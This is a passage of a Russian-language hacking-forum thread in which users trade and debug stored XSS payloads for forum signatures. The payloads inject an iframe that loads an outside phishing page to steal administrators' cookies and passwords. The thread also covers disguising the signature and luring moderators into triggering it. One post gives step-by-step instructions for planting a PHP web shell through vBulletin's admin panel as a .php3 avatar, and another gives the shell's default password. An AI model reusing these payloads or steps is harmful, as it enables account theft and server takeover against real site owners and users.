Регистрация Главная Пользователи Все разделы прочитаны
Сообщения за день Справка Регистрация

Взлом БД через форум с xss

-

Базы серверов и брут

- Все, что связано с брутом и работой с базами данных

Закрытая тема
 
Опции темы
Старый 04.06.2010, 18:32   #46
 Разведчик
Аватар для sunches
 
sunches на правильном путиsunches на правильном пути
Регистрация: 12.12.2009
Сообщений: 24
Популярность: 149
Сказал(а) спасибо: 143
Поблагодарили 19 раз(а) в 9 сообщениях
 
По умолчанию Re: Взлом БД через форум с xss

через Total Commander можно выставить права просто потконектится к фтп чере TC выбрать файл куда сохраняются пасы т.е. pass.txt или что у вас там в коммандере Файл--->Изменить атрибуты ну и вводите 777
 
Старый 04.06.2010, 18:44   #47
 Разведчик
Аватар для poops
 
poops никому не известный тип
Регистрация: 02.05.2010
Сообщений: 1
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: Взлом БД через форум с xss

скажите плих где тут ошибка

[acronym=[acronym=style=background:url('//')onerror=document.write("\x3Cl******\x20src=http://forum-ongame0.1gb.ru\x20frameborder=0\x20width=100%\20he ight=100%\x20scrolling=no\x3E\x3C/******\x3E");document.close();]][/acronym][/acronym][acronym=[acronym=onmouseover=document.write(x3C******\x20sr c=http://forum-ongame0.1gb.ru\x20frambeborder=0\x20width=100%\x20 height=100%\x20scrolling=no\x3E\x3C/inframe\x3E");document.close();]__________________________________________________ _____
____________________][/acronym][/acronym]


вссе делаю как надо * убрал сделал норм но после как нажимаю Обновить подпись уменя не кидает на фейк(
 
Старый 04.06.2010, 18:53   #48
 Пехотинец
Аватар для Helko
 
Helko на правильном путиHelko на правильном пути
Регистрация: 19.03.2010
Сообщений: 76
Популярность: 156
Сказал(а) спасибо: 18
Поблагодарили 135 раз(а) в 53 сообщениях
Отправить сообщение для Helko с помощью ICQ
 
По умолчанию Re: Взлом БД через форум с xss

Цитата:
Сообщение от poopsПосмотреть сообщение
скажите плих где тут ошибка

[acronym=[acronym=style=background:url('//')onerror=document.write("\x3Cl******\x20src=http://forum-ongame0.1gb.ru\x20frameborder=0\x20width=100%\20he ight=100%\x20scrolling=no\x3E\x3C/******\x3E");document.close();]][/acronym][/acronym][acronym=[acronym=onmouseover=document.write(x3C******\x20sr c=http://forum-ongame0.1gb.ru\x20frambeborder=0\x20width=100%\x20 height=100%\x20scrolling=no\x3E\x3C/inframe\x3E");document.close();]__________________________________________________ _____
____________________][/acronym][/acronym]


вссе делаю как надо * убрал сделал норм но после как нажимаю Обновить подпись уменя не кидает на фейк(

потому что ты уже получил кукесы
________________
698-1-896
При себе иметь 10+ сообщений. пишем сразу по делу
Раздаю свой парсер для slil.ru тут
 
Старый 04.06.2010, 22:16   #49
 Пехотинец
Аватар для DarkRider
 
DarkRider на правильном путиDarkRider на правильном пути
Регистрация: 03.05.2010
Сообщений: 50
Популярность: 182
Сказал(а) спасибо: 62
Поблагодарили 43 раз(а) в 27 сообщениях
 
По умолчанию Re: Взлом БД через форум с xss

всё делал как написано в текстовые файлы пришли акк и пас но они неподходят делал ещо раз приходило тоже самое чо это может быть?
 
Старый 05.06.2010, 07:57   #50
Читер-спонсор
 Старший сержант
Аватар для Fix
 
Fix душа компанииFix душа компанииFix душа компанииFix душа компанииFix душа компанииFix душа компанииFix душа компанииFix душа компании
Регистрация: 15.08.2009
Сообщений: 218
Популярность: 1020
Сказал(а) спасибо: 196
Поблагодарили 140 раз(а) в 84 сообщениях
Отправить сообщение для Fix с помощью ICQ Отправить сообщение для Fix с помощью Skype™
 
По умолчанию Re: Взлом БД через форум с xss

Моя опера меня не подводит(
перехожу только с IE
________________
 
Старый 05.06.2010, 15:46   #51
༼ ᕤ◕◡◕ ༽ᕤ
 Капитан
Аватар для Chipito
 
Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(
Регистрация: 09.12.2009
Сообщений: 256
Популярность: 20088
Золото Zhyk.Ru: 1
Сказал(а) спасибо: 181
Поблагодарили 681 раз(а) в 251 сообщениях
Отправить сообщение для Chipito с помощью ICQ
 
По умолчанию Re: Взлом БД через форум с xss

Цитата:
Сообщение от FixПосмотреть сообщение
Моя опера меня не подводит(
перехожу только с IE

Попробуй скачать opera portable и через нее глянуть подпись,обычно опера не делает переход из за куков.
________________
 
Старый 05.06.2010, 18:06   #52
Заблокирован
 Пехотинец
Аватар для necros555
 
necros555 скоро будет известенnecros555 скоро будет известенnecros555 скоро будет известен
Регистрация: 09.12.2009
Сообщений: 60
Популярность: 234
Сказал(а) спасибо: 25
Поблагодарили 112 раз(а) в 59 сообщениях
 
По умолчанию Re: Взлом БД через форум с xss

вот маленькая прога поможет узнать точный цвет сайта для подписи чтоб сделать ее невидимой
[Ссылки могут видеть только зарегистрированные пользователи. ]
Код:
a-squared	5.0.0.26	2010.06.05	-
AhnLab-V3	2010.06.05.00	2010.06.04	-
AntiVir	8.2.2.6	2010.06.04	-
AVG	9.0.0.787	2010.06.05	-
BitDefender	7.2	2010.06.05	-
ClamAV	0.96.0.3-git	2010.06.05	-
DrWeb	5.0.2.03300	2010.06.05	-
eSafe	7.0.17.0	2010.06.03	-
F-Secure	9.0.15370.0	2010.06.04	-
Fortinet	4.1.133.0	2010.06.05	-
GData	21	2010.06.05	-
Ikarus	T3.1.1.84.0	2010.06.05	-
Kaspersky	7.0.0.125	2010.06.05	-
McAfee	5.400.0.1158	2010.06.05	-
McAfee-GW-Edition	2010.1	2010.06.05	-
Microsoft	1.5802	2010.06.05	-
NOD32	5174	2010.06.05	-
Norman	6.04.12	2010.06.05	-
nProtect	2010-06-05.01	2010.06.05	-
PCTools	7.0.3.5	2010.06.05	-
Sophos	4.53.0	2010.06.05	-
Sunbelt	6409	2010.06.05	-
Symantec	20101.1.0.89	2010.06.05	-
VBA32	3.12.12.5	2010.06.04	-
VirusBuster	5.0.27.0	2010.06.04	-
 
Старый 05.06.2010, 18:31   #53
Заблокирован
 Рыцарь
Аватар для m0nk
 
m0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компании
Регистрация: 10.12.2009
Сообщений: 330
Популярность: 1099
Сказал(а) спасибо: 148
Поблагодарили 375 раз(а) в 108 сообщениях
Отправить сообщение для m0nk с помощью ICQ
 
По умолчанию Re: Взлом БД через форум с xss

Люди вот так делать ненужно, во 1) Его уже взломали Во 2) Вы бы хотябы скрыли под цвет и в 3) спалитесь быстро
[Ссылки могут видеть только зарегистрированные пользователи. ]
 
Старый 05.06.2010, 20:01   #54
Заблокирован
 Капитан
Аватар для BlackWinG
 
BlackWinG излучает ауруBlackWinG излучает ауруBlackWinG излучает ауруBlackWinG излучает ауруBlackWinG излучает ауруBlackWinG излучает ауру
Регистрация: 08.04.2010
Сообщений: 279
Популярность: 654
Сказал(а) спасибо: 126
Поблагодарили 277 раз(а) в 113 сообщениях
Отправить сообщение для BlackWinG с помощью ICQ Отправить сообщение для BlackWinG с помощью Skype™
 
По умолчанию Re: Взлом БД через форум с xss

Тоесть грубо говоря если у админа Оперы и не почищены куки, то не сработает?
 
Старый 05.06.2010, 20:19   #55
༼ ᕤ◕◡◕ ༽ᕤ
 Капитан
Аватар для Chipito
 
Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(
Регистрация: 09.12.2009
Сообщений: 256
Популярность: 20088
Золото Zhyk.Ru: 1
Сказал(а) спасибо: 181
Поблагодарили 681 раз(а) в 251 сообщениях
Отправить сообщение для Chipito с помощью ICQ
 
По умолчанию Re: Взлом БД через форум с xss

Цитата:
Сообщение от BlackWinGПосмотреть сообщение
Тоесть грубо говоря если у админа Оперы и не почищены куки, то не сработает?

Если его перемещало по такой ссылке\подписи,то да,работать не будет.
________________
 
Старый 06.06.2010, 12:11   #56
Заблокирован
 Рыцарь
Аватар для m0nk
 
m0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компании
Регистрация: 10.12.2009
Сообщений: 330
Популярность: 1099
Сказал(а) спасибо: 148
Поблагодарили 375 раз(а) в 108 сообщениях
Отправить сообщение для m0nk с помощью ICQ
 
По умолчанию Re: Взлом БД через форум с xss

шелл [Ссылки могут видеть только зарегистрированные пользователи. ]
Как залить:
В админке:
Форумы->Прикрепляемые файлы->Типы файлов

жмем "Добавить новый тип"->"Использовать какой-нибудь тип как базовый?" - выбираем "Основан на типе php"->"Расширение прикрепляемого файла" - php3 (просто php есть в списке по умолчанию и при загрузке автоматически переименовывается в .txt)->"MIME-тип файла" - unknown/unknown->"Разрешить использовать этот тип файлов, как аватар или фотографию?" - да.

Топаем в свой профиль:

[Ссылки могут видеть только зарегистрированные пользователи. ]

грузим аву-шелл с расширением php3 и получаем шелл по адресу:

[Ссылки могут видеть только зарегистрированные пользователи. ]
 
2 пользователя(ей) сказали cпасибо:
4uzet (08.06.2010), object (07.06.2010)
Старый 06.06.2010, 13:53   #57
Читер-спонсор
 Старший сержант
Аватар для Fix
 
Fix душа компанииFix душа компанииFix душа компанииFix душа компанииFix душа компанииFix душа компанииFix душа компанииFix душа компании
Регистрация: 15.08.2009
Сообщений: 218
Популярность: 1020
Сказал(а) спасибо: 196
Поблагодарили 140 раз(а) в 84 сообщениях
Отправить сообщение для Fix с помощью ICQ Отправить сообщение для Fix с помощью Skype™
 
По умолчанию Re: Взлом БД через форум с xss

логин/пароль для wso: root
________________
 
Пользователь сказал cпасибо:
object (07.06.2010)
Старый 07.06.2010, 21:55   #58
Заблокирован
 Пехотинец
Аватар для fesssi
 
fesssi скоро будет известенfesssi скоро будет известенfesssi скоро будет известенfesssi скоро будет известенfesssi скоро будет известен
Регистрация: 14.11.2009
Сообщений: 64
Популярность: 425
Сказал(а) спасибо: 35
Поблагодарили 134 раз(а) в 56 сообщениях
Отправить сообщение для fesssi с помощью ICQ Отправить сообщение для fesssi с помощью Skype™
 
По умолчанию Re: Взлом БД через форум с xss

ВИдел очень много вопросов с кодом ТИПА чо у мя неправильно
Вот самый упрощеный пример:

Код:
[acronym=test1[acronym=test2 onmouseover=document.write("\x3C******\x20src=ВОТ_ТУТ_ВАШ_ФЕЙК\x20frameborder=0\x20width=100%\x20height=100%\x20scrolling=no\x3E\x3C/******\x3E");document.close(); ]_]_____________Я в полном ШОКЕ _________[/acronym]_[/acronym][/color*] 
acronym]
Работает безотказно проверено Еще дам подсказуку чтоб непромахнулся модератор можно вместо _____________Я в полном ШОКЕ _________ постовить код любого аватара например типа вот ТАК:
<a target="_blank" href="http://www.radikal.ru"><img src="http://s001.radikal.ru/i194/1006/a6/da76f297d94e.gif" ></a>

После єтого надпись невидно но зато очень класно срабатывает наведение курсора на картинку. Адрес аватара для подписи можно взять например отсюда: [Ссылки могут видеть только зарегистрированные пользователи. ]


Буду рад если помог)
А совсем забыл все остальные фишки типа времени удаления и т.д и т.п. можно добавлять по желании пример самый простой для понимания...


ОТВЕТ
Если сообщение: Ваша подпись слишком длинная.
Всё ? , облом?-----------------------------------------------Я просто навел пример с картинкой, но в сравнии с добавкой на время то врятли выходит длинее.

Последний раз редактировалось fesssi; 07.06.2010 в 23:00.
 
Старый 07.06.2010, 22:18   #59
Заблокирован
 Рыцарь
Аватар для m0nk
 
m0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компании
Регистрация: 10.12.2009
Сообщений: 330
Популярность: 1099
Сказал(а) спасибо: 148
Поблагодарили 375 раз(а) в 108 сообщениях
Отправить сообщение для m0nk с помощью ICQ
 
По умолчанию Re: Взлом БД через форум с xss

можно попробовать в сообщение (лс) вставить но слишком палевно
 
Старый 07.06.2010, 22:27   #60
обжигающий
 Главнокомандующий
Аватар для object
 
object сломал счётчик популярности :(object сломал счётчик популярности :(object сломал счётчик популярности :(object сломал счётчик популярности :(object сломал счётчик популярности :(object сломал счётчик популярности :(object сломал счётчик популярности :(object сломал счётчик популярности :(object сломал счётчик популярности :(object сломал счётчик популярности :(object сломал счётчик популярности :(
Регистрация: 17.11.2009
Сообщений: 1,062
Популярность: 64819
Золото Zhyk.Ru: 170
Сказал(а) спасибо: 1,456
Поблагодарили 2,062 раз(а) в 822 сообщениях
 
По умолчанию Re: Взлом БД через форум с xss

Цитата:
Сообщение от m0nkПосмотреть сообщение
можно попробовать в сообщение (лс) вставить но слишком палевно



Да я хотел зделать по другому:
поставить подпись , и создать тему в флудилке до считаем до "Н" числа , клюнет много кого и будут аки .
Кстати созрел способ для ИЕ , точнее как заставить нужного юзера навести курсор , щяс в подполку скину .
 
Пользователь сказал cпасибо:
4uzet (07.06.2010)
Закрытая тема

Опции темы

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Взлом сервера через PHP Silence Треп 1 27.09.2010 21:41
Кража аккаунтов через форум (скрипт php) Razzor Подполье Lineage 2 (0 уровень) 1 01.08.2009 01:21

Заявление об ответственности / Список мошенников

Часовой пояс GMT +4, время: 19:02.

Пишите нам: [email protected]
Copyright © 2024 vBulletin Solutions, Inc.
Translate: zCarot. Webdesign by DevArt (Fox)
G-gaMe! Team production | Since 2008
Hosted by GShost.net